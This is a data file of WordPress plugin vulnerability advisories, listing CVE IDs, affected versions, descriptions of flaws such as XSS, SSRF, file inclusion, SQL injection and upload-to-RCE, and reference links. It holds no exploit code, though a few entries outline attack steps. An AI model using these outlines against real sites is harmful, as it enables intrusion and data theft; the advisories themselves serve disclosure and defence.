{"CVE_ID":"CVE-2024-1978","slug":"friends","versionImpact":"2.8.5","description":"The Friends plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.5 via the discover_available_feeds function. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/290\",\"name\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4564","slug":"woolementor","versionImpact":"4.4.1","description":"The CoDesigner WooCommerce Builder for Elementor \u2013 Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Shop Slider, Tabs Classic, and Image Comparison widgets in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3115e8ad-8e68-41e9-a3a0-5f003d921037?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3115e8ad-8e68-41e9-a3a0-5f003d921037?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/shop-slider\\\/template.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/shop-slider\\\/template.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/tabs-classic\\\/tabs-classic.php#L329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/tabs-classic\\\/tabs-classic.php#L329\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/image-comparison\\\/image-comparison.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/image-comparison\\\/image-comparison.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099922\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099922\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woolementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woolementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6497","slug":"squirrly-seo","versionImpact":"12.3.19","description":"The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 12.3.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb3aa613-8f34-4d96-8ddf-41fcdcf65c59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb3aa613-8f34-4d96-8ddf-41fcdcf65c59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Api.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Api.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121853\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121853\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43256","slug":"leopard-wordpress-offload-media","versionImpact":"2.0.36","description":"Missing Authorization vulnerability in nouthemes Leopard - WordPress offload media allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Leopard - WordPress offload media: from n\/a through 2.0.36.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-plugin-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-plugin-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8513","slug":"qa-heatmap-analytics","versionImpact":"4.1.0.0","description":"The QA Analytics \u2013 Web Analytics Tool with Heatmaps & Session Replay Across All Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_save_plugin_config() function in all versions up to, and including, 4.1.0.0. This makes it possible for unauthenticated attackers to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15d29d58-9e28-4e18-aeb9-9c63cb308673?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15d29d58-9e28-4e18-aeb9-9c63cb308673?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qa-heatmap-analytics\\\/trunk\\\/class-qahm-admin-page-config.php#L801\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qa-heatmap-analytics\\\/trunk\\\/class-qahm-admin-page-config.php#L801\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8392","slug":"sogrid","versionImpact":"1.5.2","description":"The WordPress Post Grid Layouts with Pagination \u2013 Sogrid plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.2 via the 'tab' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This can also be exploited via CSRF techniques.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d81e01-9b6e-48e9-b9da-85444a3694e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d81e01-9b6e-48e9-b9da-85444a3694e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sogrid\\\/trunk\\\/src\\\/admin-panel\\\/views\\\/panel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sogrid\\\/trunk\\\/src\\\/admin-panel\\\/views\\\/panel.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10260","slug":"tripetto","versionImpact":"8.0.6","description":"The Tripetto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via File uploads in all versions up to, and including, 8.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3718c252-2ca3-4f7d-b43a-3c1b2e6b34c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3718c252-2ca3-4f7d-b43a-3c1b2e6b34c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12402","slug":"tc-ecommerce","versionImpact":"1.3.4","description":"The Themes Coder \u2013 Create Android & iOS Apps For Your Woocommerce Site plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.4. This is due to the plugin not properly validating a user's identity prior to updating their password through the update_user_profile() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tc-ecommerce\\\/trunk\\\/controller\\\/app_user.php#L338\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tc-ecommerce\\\/trunk\\\/controller\\\/app_user.php#L338\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec14b1e-6d1a-4451-9fce-ac064623d92f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec14b1e-6d1a-4451-9fce-ac064623d92f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49300","slug":"hmenu","versionImpact":"1.16.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Hero Mega Menu - Responsive WordPress Menu Plugin allows Reflected XSS. This issue affects Hero Mega Menu - Responsive WordPress Menu Plugin: from n\/a through 1.16.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12036","slug":"cs-framework","versionImpact":"7.1","description":"The CS Framework plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 6.9 via the get_widget_settings_json() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ed1978e-1dd7-45d3-829a-1a75c1789827?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ed1978e-1dd7-45d3-829a-1a75c1789827?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-34085","slug":"simple-file-list","description":"An unrestricted file upload vulnerability in the WordPress Simple File List plugin prior to version 4.2.3 allows unauthenticated remote attackers to achieve remote code execution. The plugin's upload endpoint (ee-upload-engine.php) restricts file uploads based on extension, but lacks proper validation after file renaming. An attacker can first upload a PHP payload disguised as a .png file, then use the plugin\u2019s ee-file-engine.php rename functionality to change the extension to .php. This bypasses upload restrictions and results in the uploaded payload being executable on the server.","refs":"[{\"url\":\"https:\\\/\\\/packetstorm.news\\\/files\\\/id\\\/160221\",\"name\":\"https:\\\/\\\/packetstorm.news\\\/files\\\/id\\\/160221\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_simple_file_list_rce.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_simple_file_list_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/simplefilelist.com\\\/\",\"name\":\"https:\\\/\\\/simplefilelist.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-simple-file-list-plugin-rce\",\"name\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-simple-file-list-plugin-rce\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20220426044003\\\/https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10192\\\/\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20220426044003\\\/https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10192\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-file-list\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-file-list\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"name\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/simple-file-list\\\/simple-file-list-423-remote-code-execution\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/simple-file-list\\\/simple-file-list-423-remote-code-execution\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28789","slug":"contact-forms","versionImpact":"1.5.4","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.5.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1977","slug":"restaurant-solutions-checklist","description":"The Restaurant Solutions \u2013 Checklist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Checklist points in version 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dca7f2e-f572-468a-8342-a6e096441561?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dca7f2e-f572-468a-8342-a6e096441561?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wizlynxgroup.com\\\/security-research-advisories\\\/vuln\\\/WLX-2022-004\",\"name\":\"https:\\\/\\\/www.wizlynxgroup.com\\\/security-research-advisories\\\/vuln\\\/WLX-2022-004\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37959","slug":"embed-power-bi","versionImpact":"1.1.7","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Atlas Public Policy Power BI Embedded for WordPress allows Stored XSS.This issue affects Power BI Embedded for WordPress: from n\/a through 1.1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/embed-power-bi\\\/wordpress-power-bi-embedded-for-wordpress-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/embed-power-bi\\\/wordpress-power-bi-embedded-for-wordpress-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10113","slug":"wpadcenter","versionImpact":"2.5.7","description":"The WP AdCenter \u2013 Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpadcenter_ad shortcode in all versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0597a63d-2627-477f-874a-c35b6df7afd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0597a63d-2627-477f-874a-c35b6df7afd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12098","slug":"ars-affiliate-page","versionImpact":"2.0.2","description":"The ARS Affiliate Page Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'utm_keyword' parameter in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ars-affiliate-page\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ars-affiliate-page\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25b2187-2ba8-4332-9f96-a003edd97ff6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25b2187-2ba8-4332-9f96-a003edd97ff6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13403","slug":"wpforms-lite","versionImpact":"1.9.3.1","description":"The WPForms \u2013 Easy Form Builder for WordPress \u2013 Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018fieldHTML\u2019 parameter in all versions up to, and including, 1.9.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230497\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js?old=3223577&old_path=wpforms-lite%2Ftrunk%2Fassets%2Fjs%2Ffrontend%2Fwpforms.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230497\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/frontend\\\/wpforms.js?old=3223577&old_path=wpforms-lite%2Ftrunk%2Fassets%2Fjs%2Ffrontend%2Fwpforms.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpforms-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpforms-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92ea6a89-b14f-4252-b886-e219c1bb658d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92ea6a89-b14f-4252-b886-e219c1bb658d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4580","slug":"file-provider","versionImpact":"1.2.3","description":"The File Provider WordPress plugin through 1.2.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8741353a-2a7f-4dee-b62d-7f5fe435f1a1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8741353a-2a7f-4dee-b62d-7f5fe435f1a1\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-34084","slug":"boldgrid-backup","description":"An unauthenticated information disclosure vulnerability exists in the WordPress Total Upkeep plugin (also known as BoldGrid Backup) prior to version 1.14.10. The plugin exposes multiple endpoints that allow unauthenticated users to retrieve detailed server configuration (env-info.php) and discover backup metadata (restore-info.json). These backups, which may include full SQL database dumps, are accessible without authentication if their paths are known or guessed. The restore-info.json endpoint discloses the absolute filesystem path of the latest backup, which attackers can convert into a web-accessible URL under wp-content\/uploads\/ and download. Extracting the database archive may yield credential hashes from the wp_users table, facilitating offline password cracking or credential stuffing attacks.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-total-upkeep-boldgrid-backup-plugin-info-disclosure\",\"name\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-total-upkeep-boldgrid-backup-plugin-info-disclosure\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boldgrid-backup\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boldgrid-backup\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.boldgrid.com\\\/wordpress-backup-plugin\\\/\",\"name\":\"https:\\\/\\\/www.boldgrid.com\\\/wordpress-backup-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/49252\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/49252\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28781","slug":"contact-forms","versionImpact":"1.5.4","description":"Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.5.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-unauth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-contact-forms-by-cimatti-plugin-1-5-4-unauth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0900","slug":"ap-pricing-tables-lite","versionImpact":"1.1.6","description":"The Pricing Table Builder WordPress plugin through 1.1.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f601e637-a486-4f3a-9077-4f294ace7ea1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f601e637-a486-4f3a-9077-4f294ace7ea1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4374","slug":"wp-remote-users-sync","versionImpact":"1.2.11","description":"The WP Remote Users Sync plugin for WordPress is vulnerable to unauthorized access of data and addition of data due to a missing capability check on the 'refresh_logs_async' functions in versions up to, and including, 1.2.11. This makes it possible for authenticated attackers with subscriber privileges or above, to view logs.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e87cfc4-8e7c-47d6-80fc-9c293cdd8acb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e87cfc4-8e7c-47d6-80fc-9c293cdd8acb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file130\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/class-wprus-logger.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/class-wprus-logger.php#L117\",\"refsource\":\"MISC\",\"tags\":[]}]"}
